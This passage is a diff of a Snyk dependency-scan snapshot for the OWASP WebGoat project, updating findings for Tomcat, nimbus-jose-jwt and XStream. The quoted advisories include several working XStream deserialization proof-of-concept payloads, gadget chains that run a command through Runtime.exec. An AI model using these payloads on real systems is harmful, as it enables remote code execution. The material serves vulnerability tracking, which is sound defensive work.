-                "version": "6.1.5"
+                "name": "org.apache.tomcat.embed:tomcat-embed-core",
+                "version": "10.1.46"
               },
               "type": "package"
             }
           ],
           "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "high"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 128
-            }
+          "problems": [
+            { "id": "CVE-2025-61795", "source": "cve" },
+            {
+              "affected_hash_ranges": [],
+              "affected_hashes": [],
+              "affected_versions": [
+                "[,9.0.110)",
+                "[10.0.0-M1,10.1.47)",
+                "[11.0.0-M1,11.0.12)"
+              ],
+              "created_at": "2025-10-28T12:20:53.961583Z",
+              "credits": ["sw0rd1ight"],
+              "cvss_base_score": 6,
+              "cvss_sources": [
+                {
+                  "assigner": "Snyk",
+                  "base_score": 6,
+                  "cvss_version": "4.0",
+                  "modified_at": "2025-10-28T14:35:15.07262Z",
+                  "severity": "medium",
+                  "type": "primary",
+                  "vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"
+                },
+                {
+                  "assigner": "Snyk",
+                  "base_score": 5.3,
+                  "cvss_version": "3.1",
+                  "modified_at": "2025-10-28T14:35:15.07262Z",
+                  "severity": "medium",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H"
+                },
+                {
+                  "assigner": "Red Hat",
+                  "base_score": 5.3,
+                  "cvss_version": "3.1",
+                  "modified_at": "2025-10-28T05:32:00.322558Z",
+                  "severity": "medium",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H"
+                },
+                {
+                  "assigner": "SUSE",
+                  "base_score": 5.3,
+                  "cvss_version": "3.1",
+                  "modified_at": "2025-11-13T11:10:53.060933Z",
+                  "severity": "medium",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H"
+                }
+              ],
+              "cvss_vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
+              "disclosed_at": "2025-10-27T17:30:28Z",
+              "ecosystem": {
+                "language": "java",
+                "package_manager": "maven",
+                "type": "build"
+              },
+              "epss_details": {
+                "model_version": "v2025.03.14",
+                "percentile": "0.31301",
+                "probability": "0.00117"
+              },
+              "exploit_details": {
+                "maturity_levels": [
+                  {
+                    "format": "CVSSv3",
+                    "level": "not defined",
+                    "type": "secondary"
+                  },
+                  {
+                    "format": "CVSSv4",
+                    "level": "not defined",
+                    "type": "primary"
+                  }
+                ],
+                "sources": []
+              },
+              "id": "SNYK-JAVA-ORGAPACHETOMCATEMBED-13723930",
+              "initially_fixed_in_versions": ["9.0.110", "10.1.47", "11.0.12"],
+              "is_fixable": true,
+              "is_malicious": false,
+              "is_social_media_trending": false,
+              "modified_at": "2025-11-13T11:10:53.060933Z",
+              "package_name": "org.apache.tomcat.embed:tomcat-embed-core",
+              "package_version": "",
+              "published_at": "2025-10-28T14:35:15.060605Z",
+              "references": [
+                {
+                  "title": "Apache Mail",
+                  "url": "https://lists.apache.org/thread/wm9mx8brmx9g4zpywm06ryrtvd3160pp"
+                },
+                {
+                  "title": "GitHub Commit",
+                  "url": "https://github.com/apache/tomcat/commit/1cdf5f730ede75a0759492f179ac21ca4ff68e06"
+                },
+                {
+                  "title": "GitHub Commit",
+                  "url": "https://github.com/apache/tomcat/commit/af6e9181620304c0d818121c29c074e1330610d0"
+                },
+                {
+                  "title": "GitHub Commit",
+                  "url": "https://github.com/apache/tomcat/commit/afa422bd7ca1eef0f507259c682fd876494d9c3b"
+                },
+                {
+                  "title": "Red Hat Bugzilla Bug",
+                  "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2406588"
+                },
+                {
+                  "title": "Vulnerability Advisory",
+                  "url": "https://tomcat.apache.org/security-11.html%23Fixed_in_Apache_Tomcat_11.0.12"
+                }
+              ],
+              "severity": "medium",
+              "source": "snyk_vuln"
+            },
+            { "id": "CWE-404", "source": "cwe" }
+          ],
+          "rating": { "severity": "medium" },
+          "risk": { "risk_score": { "value": 87 } },
+          "suppression": {
+            "created_at": "2025-11-11T11:44:46.474Z",
+            "expires_at": "2026-12-12T00:00:00Z",
+            "justification": "False positive",
+            "path": ["*"],
+            "policy": "local_policy",
+            "status": "ignored"
           },
-          "title": "Authentication Bypass"
+          "title": "Improper Resource Shutdown or Release"
         },
-        "id": "0000004d-0000-4000-8000-00000000004d",
+        "id": "00000000-0000-0000-0000-000000000027",
         "links": {},
         "relationships": {
           "fix": {
@@ -15883,21 +4676,25 @@
               "attributes": {
                 "action": {
                   "format": "upgrade_package_advice",
-                  "package_name": "org.springframework.security:spring-security-core",
+                  "package_name": "org.apache.tomcat.embed:tomcat-embed-core",
                   "upgrade_paths": [
                     {
                       "dependency_path": [
                         {
                           "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
+                          "version": "2025.4-SNAPSHOT"
+                        },
+                        {
+                          "name": "org.springframework.boot:spring-boot-starter-web",
+                          "version": "3.5.7"
                         },
                         {
-                          "name": "org.springframework.boot:spring-boot-starter-oauth2-client",
-                          "version": "3.1.9"
+                          "name": "org.springframework.boot:spring-boot-starter-tomcat",
+                          "version": "3.5.7"
                         },
                         {
-                          "name": "org.springframework.security:spring-security-core",
-                          "version": "6.1.7"
+                          "name": "org.apache.tomcat.embed:tomcat-embed-core",
+                          "version": "10.1.48"
                         }
                       ],
                       "is_drop": false
@@ -15906,7 +4703,7 @@
                 },
                 "outcome": "fully_resolved"
               },
-              "id": "0000004d-0000-4000-8000-00000000004d",
+              "id": "00000000-0000-0000-0000-000000000027",
               "type": "fixes"
             }
           }
@@ -15916,54 +4713,146 @@
       {
         "attributes": {
           "cause_of_failure": false,
-          "description": "## Overview\n[com.nimbusds:nimbus-jose-jwt](https://connect2id.com/products/nimbus-jose-jwt) is a library for JSON Web Tokens (JWT)\n\nAffected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling due to a large JWE `p2c` header value (AKA iteration count) for the `PasswordBasedDecrypter` (PBKDF2) class. An attacker can cause resource consumption by specifying an excessively large iteration count.\n## Remediation\nUpgrade `com.nimbusds:nimbus-jose-jwt` to version 9.37.2 or higher.\n## References\n- [Bitbucket Commit](https://bitbucket.org/connect2id/nimbus-jose-jwt/commits/3b3b77e)\n- [Bitbucket Issue](https://bitbucket.org/connect2id/nimbus-jose-jwt/issues/526/)\n",
+          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability which may allow a remote attacker who has sufficient rights to execute local commands on the host only by manipulating the processed input stream. \r\n\r\n### PoC\r\n```\r\n\u003cjava.util.PriorityQueue serialization='custom'\u003e\r\n  \u003cunserializable-parents/\u003e\r\n  \u003cjava.util.PriorityQueue\u003e\r\n    \u003cdefault\u003e\r\n      \u003csize\u003e2\u003c/size\u003e\r\n      \u003ccomparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'\u003e\r\n        \u003cindexMap class='com.sun.xml.internal.ws.client.ResponseContext'\u003e\r\n          \u003cpacket\u003e\r\n            \u003cmessage class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'\u003e\r\n              \u003cdataSource class='com.sun.xml.internal.ws.message.JAXBAttachment'\u003e\r\n                \u003cbridge class='com.sun.xml.internal.ws.db.glassfish.BridgeWrapper'\u003e\r\n                  \u003cbridge class='com.sun.xml.internal.bind.v2.runtime.BridgeImpl'\u003e\r\n                    \u003cbi class='com.sun.xml.internal.bind.v2.runtime.ClassBeanInfoImpl'\u003e\r\n                      \u003cjaxbType\u003ecom.sun.corba.se.impl.activation.ServerTableEntry\u003c/jaxbType\u003e\r\n                      \u003curiProperties/\u003e\r\n                      \u003cattributeProperties/\u003e\r\n                      \u003cinheritedAttWildcard class='com.sun.xml.internal.bind.v2.runtime.reflect.Accessor$GetterSetterReflection'\u003e\r\n                        \u003cgetter\u003e\r\n                          \u003cclass\u003ecom.sun.corba.se.impl.activation.ServerTableEntry\u003c/class\u003e\r\n                          \u003cname\u003everify\u003c/name\u003e\r\n                          \u003cparameter-types/\u003e\r\n                        \u003c/getter\u003e\r\n                      \u003c/inheritedAttWildcard\u003e\r\n                    \u003c/bi\u003e\r\n                    \u003ctagName/\u003e\r\n                    \u003ccontext\u003e\r\n                      \u003cmarshallerPool class='com.sun.xml.internal.bind.v2.runtime.JAXBContextImpl$1'\u003e\r\n                        \u003couter-class reference='../..'/\u003e\r\n                      \u003c/marshallerPool\u003e\r\n                      \u003cnameList\u003e\r\n                        \u003cnsUriCannotBeDefaulted\u003e\r\n                          \u003cboolean\u003etrue\u003c/boolean\u003e\r\n                        \u003c/nsUriCannotBeDefaulted\u003e\r\n                        \u003cnamespaceURIs\u003e\r\n                          \u003cstring\u003e1\u003c/string\u003e\r\n                        \u003c/namespaceURIs\u003e\r\n                        \u003clocalNames\u003e\r\n                          \u003cstring\u003eUTF-8\u003c/string\u003e\r\n                        \u003c/localNames\u003e\r\n                      \u003c/nameList\u003e\r\n                    \u003c/context\u003e\r\n                  \u003c/bridge\u003e\r\n                \u003c/bridge\u003e\r\n                \u003cjaxbObject class='com.sun.corba.se.impl.activation.com.sun.corba.se.impl.activation.ServerTableEntry'\u003e\r\n                  \u003cactivationCmd\u003ecalc\u003c/activationCmd\u003e\r\n                \u003c/jaxbObject\u003e\r\n              \u003c/dataSource\u003e\r\n            \u003c/message\u003e\r\n            \u003csatellites/\u003e\r\n            \u003cinvocationProperties/\u003e\r\n          \u003c/packet\u003e\r\n        \u003c/indexMap\u003e\r\n      \u003c/comparator\u003e\r\n    \u003c/default\u003e\r\n    \u003cint\u003e3\u003c/int\u003e\r\n    \u003cstring\u003ejavax.xml.ws.binding.attachments.inbound\u003c/string\u003e\r\n    \u003cstring\u003ejavax.xml.ws.binding.attachments.inbound\u003c/string\u003e\r\n  \u003c/java.util.PriorityQueue\u003e\r\n\u003c/java.util.PriorityQueue\u003e\r\n```\r\n\r\nUsers who follow [the recommendation](https://x-stream.github.io/security.html#workaround) to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n  \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n  \n\n\u003e Developers put too much trust in Java Object Serialization. Some even de",
           "evidence": [
             {
               "path": [
                 {
                   "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
-                },
-                {
-                  "name": "org.springframework.boot:spring-boot-starter-oauth2-client",
-                  "version": "3.1.5"
-                },
-                {
-                  "name": "org.springframework.security:spring-security-oauth2-jose",
-                  "version": "6.1.5"
+                  "version": "2025.4-SNAPSHOT"
                 },
                 {
-                  "name": "com.nimbusds:nimbus-jose-jwt",
-                  "version": "9.24.4"
+                  "name": "com.thoughtworks.xstream:xstream",
+                  "version": "1.4.5"
                 }
               ],
               "source": "dependency_path"
             }
           ],
           "finding_type": "sca",
-          "key": "0000004e-0000-4000-8000-00000000004e",
+          "key": "00000000-0000-0000-0000-000000000028",
           "locations": [
             {
               "package": {
-                "name": "com.nimbusds:nimbus-jose-jwt",
-                "version": "9.24.4"
+                "name": "com.thoughtworks.xstream:xstream",
+                "version": "1.4.5"
               },
               "type": "package"
             }
           ],
           "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "high"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 100
-            }
-          },
-          "title": "Allocation of Resources Without Limits or Throttling"
+          "problems": [
+            { "id": "CVE-2021-21345", "source": "cve" },
+            {
+              "affected_hash_ranges": [],
+              "affected_hashes": [],
+              "affected_versions": ["[,1.4.16)"],
+              "created_at": "2021-03-23T12:09:53.420253Z",
+              "credits": ["Liaogui Zhong"],
+              "cvss_base_score": 5.8,
+              "cvss_sources": [
+                {
+                  "assigner": "Snyk",
+                  "base_score": 5.8,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-06T13:59:48.500447Z",
+                  "severity": "medium",
+                  "type": "primary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:N/I:H/A:N/E:P"
+                },
+                {
+                  "assigner": "NVD",
+                  "base_score": 9.9,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:52:02.951486Z",
+                  "severity": "critical",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
+                },
+                {
+                  "assigner": "Red Hat",
+                  "base_score": 8.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:53:48.461744Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H"
+                },
+                {
+                  "assigner": "SUSE",
+                  "base_score": 8.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:49:07.95529Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H"
+                }
+              ],
+              "cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:N/I:H/A:N/E:P",
+              "disclosed_at": "2021-03-23T11:50:00Z",
+              "ecosystem": {
+                "language": "java",
+                "package_manager": "maven",
+                "type": "build"
+              },
+              "epss_details": {
+                "model_version": "v2025.03.14",
+                "percentile": "0.99400",
+                "probability": "0.87079"
+              },
+              "exploit_details": {
+                "maturity_levels": [
+                  {
+                    "format": "CVSSv3",
+                    "level": "proof of concept",
+                    "type": "secondary"
+                  },
+                  {
+                    "format": "CVSSv4",
+                    "level": "proof of concept",
+                    "type": "primary"
+                  }
+                ],
+                "sources": ["Nuclei Templates", "Snyk"]
+              },
+              "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088328",
+              "initially_fixed_in_versions": ["1.4.16"],
+              "is_fixable": true,
+              "is_malicious": false,
+              "is_social_media_trending": false,
+              "modified_at": "2025-11-12T05:03:52.70816Z",
+              "package_name": "com.thoughtworks.xstream:xstream",
+              "package_version": "",
+              "published_at": "2021-03-23T17:13:20.978671Z",
+              "references": [
+                {
+                  "title": "XStream Advisory",
+                  "url": "https://x-stream.github.io/CVE-2021-21345.html"
+                },
+                {
+                  "title": "XStream Changelog",
+                  "url": "http://x-stream.github.io/changes.html%231.4.16"
+                },
+                {
+                  "title": "XStream Workaround",
+                  "url": "https://x-stream.github.io/security.html%23workaround"
+                },
+                {
+                  "title": "Nuclei Templates",
+                  "url": "https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-21345.yaml"
+                }
+              ],
+              "severity": "medium",
+              "source": "snyk_vuln"
+            },
+            { "id": "CWE-502", "source": "cwe" },
+            { "id": "GHSA-hwpc-8xqv-jvj4", "source": "ghsa" }
+          ],
+          "rating": { "severity": "medium" },
+          "risk": { "risk_score": { "value": 334 } },
+          "title": "Deserialization of Untrusted Data"
         },
-        "id": "0000004e-0000-4000-8000-00000000004e",
+        "id": "00000000-0000-0000-0000-000000000028",
         "links": {},
         "relationships": {
           "fix": {
@@ -15971,25 +4860,17 @@
               "attributes": {
                 "action": {
                   "format": "upgrade_package_advice",
-                  "package_name": "com.nimbusds:nimbus-jose-jwt",
+                  "package_name": "com.thoughtworks.xstream:xstream",
                   "upgrade_paths": [
                     {
                       "dependency_path": [
                         {
                           "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
-                        },
-                        {
-                          "name": "org.springframework.boot:spring-boot-starter-oauth2-client",
-                          "version": "3.2.7"
-                        },
-                        {
-                          "name": "org.springframework.security:spring-security-oauth2-jose",
-                          "version": "6.2.5"
+                          "version": "2025.4-SNAPSHOT"
                         },
                         {
-                          "name": "com.nimbusds:nimbus-jose-jwt",
-                          "version": "9.37.3"
+                          "name": "com.thoughtworks.xstream:xstream",
+                          "version": "1.4.16"
                         }
                       ],
                       "is_drop": false
@@ -15998,7 +4879,7 @@
                 },
                 "outcome": "fully_resolved"
               },
-              "id": "0000004e-0000-4000-8000-00000000004e",
+              "id": "00000000-0000-0000-0000-000000000028",
               "type": "fixes"
             }
           }
@@ -16008,13 +4889,13 @@
       {
         "attributes": {
           "cause_of_failure": false,
-          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. A user is only affected if using the version out of the box with JDK 1.7u21 or below.  However, this scenario can be adjusted easily to an external Xalan that works regardless of the version of the Java runtime. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.\r\n\r\n### PoC\r\n\r\n```\r\n\u003clinked-hash-set\u003e\r\n  \u003ccom.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl serialization='custom'\u003e\r\n    \u003ccom.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\u003e\r\n      \u003cdefault\u003e\r\n        \u003c__name\u003ePwnr\u003c/__name\u003e\r\n        \u003c__bytecodes\u003e\r\n          \u003cbyte-array\u003eyv66vgAAADIAOQoAAwAiBwA3BwAlBwAmAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBa0gk/OR3e8+AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABNTdHViVHJhbnNsZXRQYXlsb2FkAQAMSW5uZXJDbGFzc2VzAQA1THlzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkU3R1YlRyYW5zbGV0UGF5bG9hZDsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcAJwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAoAQAzeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRTdHViVHJhbnNsZXRQYXlsb2FkAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAFGphdmEvaW8vU2VyaWFsaXphYmxlAQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAfeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cwEACDxjbGluaXQ+AQARamF2YS9sYW5nL1J1bnRpbWUHACoBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7DAAsAC0KACsALgEACGNhbGMuZXhlCAAwAQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwwAMgAzCgArADQBAA1TdGFja01hcFRhYmxlAQAeeXNvc2VyaWFsL1B3bmVyNDE2NTkyOTE1MTgwNjAwAQAgTHlzb3NlcmlhbC9Qd25lcjQxNjU5MjkxNTE4MDYwMDsAIQACAAMAAQAEAAEAGgAFAAYAAQAHAAAAAgAIAAQAAQAKAAsAAQAMAAAALwABAAEAAAAFKrcAAbEAAAACAA0AAAAGAAEAAAAvAA4AAAAMAAEAAAAFAA8AOAAAAAEAEwAUAAIADAAAAD8AAAADAAAAAbEAAAACAA0AAAAGAAEAAAA0AA4AAAAgAAMAAAABAA8AOAAAAAAAAQAVABYAAQAAAAEAFwAYAAIAGQAAAAQAAQAaAAEAEwAbAAIADAAAAEkAAAAEAAAAAbEAAAACAA0AAAAGAAEAAAA4AA4AAAAqAAQAAAABAA8AOAAAAAAAAQAVABYAAQAAAAEAHAAdAAIAAAABAB4AHwADABkAAAAEAAEAGgAIACkACwABAAwAAAAkAAMAAgAAAA+nAAMBTLgALxIxtgA1V7EAAAABADYAAAADAAEDAAIAIAAAAAIAIQARAAAACgABAAIAIwAQAAk=\u003c/byte-array\u003e\r\n          \u003cbyte-array\u003eyv66vgAAADIAGwoAAwAVBwAXBwAYBwAZAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBXHmae48bUcYAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAANGb28BAAxJbm5lckNsYXNzZXMBACVMeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb287AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAaAQAjeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb28BABBqYXZhL2xhbmcvT2JqZWN0AQAUamF2YS9pby9TZXJpYWxpemFibGUBAB95c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzACEAAgADAAEABAABABoABQAGAAEABwAAAAIACAABAAEACgALAAEADAAAAC8AAQABAAAABSq3AAGxAAAAAgANAAAABgABAAAAPAAOAAAADAABAAAABQAPABIAAAACABMAAAACABQAEQAAAAoAAQACABYAEAAJ\u003c/byte-array\u003e\r\n        \u003c/__bytecodes\u003e\r\n        \u003c__transletIndex\u003e-1\u003c/__transletIndex\u003e\r\n        \u003c__indentNumber\u003e0\u003c/__indentNumber\u003e\r\n      \u003c/default\u003e\r\n    \u003c/com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\u003e\r\n  \u003c/com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\u003e\r\n  \u003cdynamic-proxy\u003e\r\n    \u003cinterface\u003ejavax.xml.transform.Templates\u003c/interface\u003e\r\n    \u003chandler class='sun.reflect.annotation.AnnotationInvocationHandler' serialization='custom'\u003e\r\n      \u003csun.reflect.annotation.AnnotationInvocationHandler\u003e\r\n        \u003cdefault\u003e\r\n          \u003cmemberValues\u003e\r\n            \u003centry\u003e\r\n              \u003cstring\u003ef5a5a608\u003c/string\u003e\r\n              \u003ccom.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl reference='../../../../../../../com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl'/\u003e\r\n            \u003c/entry\u003e\r\n          \u003c/memberValues\u003e\r\n          \u003ctype\u003ejavax.xml.transform.Templates\u003c/type\u003e\r\n        \u003c/default\u003e\r\n      \u003c/sun.reflect.annotation.AnnotationInvocationHandler\u003e\r\n    \u003c/handler\u003e\r\n  \u003c/dynamic-proxy\u003e\r\n\u003c/linked-hash-set\u003e\r\n```\r\n\r\n```\r\nXStream xstream = new XStream();\r\nxstream.f",
+          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE). This vulnerability may allow a remote attacker that has sufficient rights to execute commands on the host only by manipulating the processed input stream. No user is affected who followed the recommendation to set up XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 no longer uses a blacklist by default, since it cannot be secured for general purposes.\r\n\r\n## PoC\r\n\r\n```\r\n\u003cjava.util.PriorityQueue serialization='custom'\u003e\r\n  \u003cunserializable-parents/\u003e\r\n  \u003cjava.util.PriorityQueue\u003e\r\n    \u003cdefault\u003e\r\n      \u003csize\u003e2\u003c/size\u003e\r\n    \u003c/default\u003e\r\n    \u003cint\u003e3\u003c/int\u003e\r\n    \u003cdynamic-proxy\u003e\r\n      \u003cinterface\u003ejava.lang.Comparable\u003c/interface\u003e\r\n      \u003chandler class='sun.tracing.NullProvider'\u003e\r\n        \u003cactive\u003etrue\u003c/active\u003e\r\n        \u003cproviderType\u003ejava.lang.Comparable\u003c/providerType\u003e\r\n        \u003cprobes\u003e\r\n          \u003centry\u003e\r\n            \u003cmethod\u003e\r\n              \u003cclass\u003ejava.lang.Comparable\u003c/class\u003e\r\n              \u003cname\u003ecompareTo\u003c/name\u003e\r\n              \u003cparameter-types\u003e\r\n                \u003cclass\u003ejava.lang.Object\u003c/class\u003e\r\n              \u003c/parameter-types\u003e\r\n            \u003c/method\u003e\r\n            \u003csun.tracing.dtrace.DTraceProbe\u003e\r\n              \u003cproxy class='java.lang.Runtime'/\u003e\r\n              \u003cimplementing__method\u003e\r\n                \u003cclass\u003ejava.lang.Runtime\u003c/class\u003e\r\n                \u003cname\u003eexec\u003c/name\u003e\r\n                \u003cparameter-types\u003e\r\n                  \u003cclass\u003ejava.lang.String\u003c/class\u003e\r\n                \u003c/parameter-types\u003e\r\n              \u003c/implementing__method\u003e\r\n            \u003c/sun.tracing.dtrace.DTraceProbe\u003e\r\n          \u003c/entry\u003e\r\n        \u003c/probes\u003e\r\n      \u003c/handler\u003e\r\n    \u003c/dynamic-proxy\u003e\r\n    \u003cstring\u003ecalc\u003c/string\u003e\r\n  \u003c/java.util.PriorityQueue\u003e\r\n\u003c/java.util.PriorityQueue\u003e\r\n```\r\n\r\n```\r\nXStream xstream = new XStream();\r\nxstream.fromXML(xml);\r\n```\n## Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.18 or higher.\n## References\n- [XStream Advisory](https://x-stream.github.io/CVE-2021-39144.html)\n- [XStream Changelog](https://x-stream.github.io/changes.html#1.4.18)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-39144.yaml)\n",
           "evidence": [
             {
               "path": [
                 {
                   "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
+                  "version": "2025.4-SNAPSHOT"
                 },
                 {
                   "name": "com.thoughtworks.xstream:xstream",
@@ -16025,7 +4906,7 @@
             }
           ],
           "finding_type": "sca",
-          "key": "0000004f-0000-4000-8000-00000000004f",
+          "key": "00000000-0000-0000-0000-000000000029",
           "locations": [
             {
               "package": {
@@ -16036,18 +4917,110 @@
             }
           ],
           "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "high"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 275
-            }
-          },
-          "title": "Arbitrary Code Execution"
+          "problems": [
+            {
+              "affected_hash_ranges": [],
+              "affected_hashes": [],
+              "affected_versions": ["[,1.4.18)"],
+              "created_at": "2021-08-24T08:20:29.336468Z",
+              "credits": ["Ceclin and YXXX"],
+              "cvss_base_score": 8.5,
+              "cvss_sources": [
+                {
+                  "assigner": "Snyk",
+                  "base_score": 8.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-06T14:02:06.755154Z",
+                  "severity": "high",
+                  "type": "primary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H/E:H"
+                },
+                {
+                  "assigner": "NVD",
+                  "base_score": 8.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:48:12.430348Z",
+                  "severity": "high",
+                  "type": "secondary",
